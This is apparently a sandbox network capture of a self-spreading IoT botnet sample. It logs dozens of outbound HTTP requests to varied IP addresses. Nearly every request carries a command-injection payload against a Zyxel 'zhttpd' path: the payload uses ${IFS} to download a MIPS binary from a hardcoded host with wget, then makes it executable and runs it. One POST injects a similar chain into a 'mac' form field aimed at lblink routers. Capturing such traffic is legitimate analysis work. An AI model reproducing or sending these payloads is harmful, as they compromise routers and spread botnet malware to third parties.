                                      Jan 14, 2024 15:50:56.537054062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7039192.168.2.145551657.168.217.157443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.537094116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7040192.168.2.1436668185.4.42.83443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.537128925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7041192.168.2.144002850.118.27.219443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.537156105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7042192.168.2.143367854.153.45.85443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.537188053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7043192.168.2.1434184100.32.8.143443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.537247896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7044192.168.2.1435940140.83.102.27443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.537313938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7045192.168.2.1438480124.43.67.205443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.537314892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7046192.168.2.1446528152.90.128.179443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.537352085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7047192.168.2.1448150109.250.255.112443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.537395954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7048192.168.2.1454514154.27.223.195443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.537456989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7049192.168.2.145668224.88.130.45443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.537470102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7050192.168.2.143408032.110.227.116443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.537512064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7051192.168.2.1454468152.156.130.39443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.537539005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7052192.168.2.144030075.187.56.240443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.537607908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7053192.168.2.1455214146.132.170.89443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.537648916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7054192.168.2.1458998137.210.155.217443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.537703037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7055192.168.2.145989052.24.229.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.537738085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7056192.168.2.145321246.164.19.200443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.537770987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7057192.168.2.145328896.139.135.103443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.537807941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7058192.168.2.1452568185.171.208.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.537837982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7059192.168.2.144946284.215.220.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.537905931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7060192.168.2.1433012113.30.22.191443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.537938118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7061192.168.2.1438998147.179.183.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.537957907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7062192.168.2.144275078.80.99.81443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.538002968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7063192.168.2.1458838194.77.138.238443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.538028955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7064192.168.2.1435776211.54.20.181443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.538090944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7065192.168.2.1440730172.133.56.15443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.538135052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7066192.168.2.144656298.255.115.255443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.538172960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7067192.168.2.144369837.17.13.588080
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.145276070 CET228OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                      Cookie: user=admin
                                      Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                      Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.152/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;
                                      Jan 14, 2024 15:50:57.419197083 CET342INHTTP/1.1 404 Not Found
                                      Date: Sun, 14 Jan 2024 17:44:14 GMT
                                      Server: Boa/0.94.14rc21
                                      Accept-Ranges: bytes
                                      Connection: close
                                      Content-Type: text/html; charset=ISO-8859-1
                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 67 6f 66 6f 72 6d 2f 73 65 74 5f 4c 69 6d 69 74 43 6c 69 65 6e 74 5f 63 66 67 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                      Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>404 Not Found</H1>The requested URL /goform/set_LimitClient_cfg was not found on this server.</BODY></HTML>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7068192.168.2.1445544178.184.137.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.545996904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7069192.168.2.146026054.106.49.144443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.546030998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7070192.168.2.1432860197.110.59.80443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.546066999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7071192.168.2.143510846.48.168.214443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.546111107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7072192.168.2.1448634136.71.233.171443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.546156883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7073192.168.2.1443182140.77.96.214443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.546195030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7074192.168.2.1446996139.58.81.25443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.546235085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7075192.168.2.1443858177.105.173.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.546277046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7076192.168.2.145012041.58.109.231443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.546333075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7077192.168.2.1446200170.139.222.22443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.546356916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7078192.168.2.1434422181.176.70.21443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.546366930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7079192.168.2.144885487.123.16.138443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.546406031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7080192.168.2.145937817.143.106.230443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.546449900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7081192.168.2.1457456102.159.138.0443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.546502113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7082192.168.2.144057824.118.182.249443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.546546936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7083192.168.2.143291617.190.175.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.546596050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7084192.168.2.143904488.177.162.235443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.546644926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7085192.168.2.143724267.118.140.252443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.546684027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7086192.168.2.1450780117.219.153.254443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.546740055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7087192.168.2.1456436115.136.180.15443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.546792984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7088192.168.2.143903248.49.204.184443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.546838045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7089192.168.2.1450588204.53.74.246443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.546899080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7090192.168.2.144048413.99.251.27443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.546931028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7091192.168.2.1439046134.159.4.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.546957970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7092192.168.2.1450968152.31.97.176443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.547019005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7093192.168.2.1442144177.155.113.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.547049999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7094192.168.2.146038480.199.92.116443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.547095060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7095192.168.2.1451454180.221.35.106443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.547131062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7096192.168.2.143918465.55.118.46443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:57.547172070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
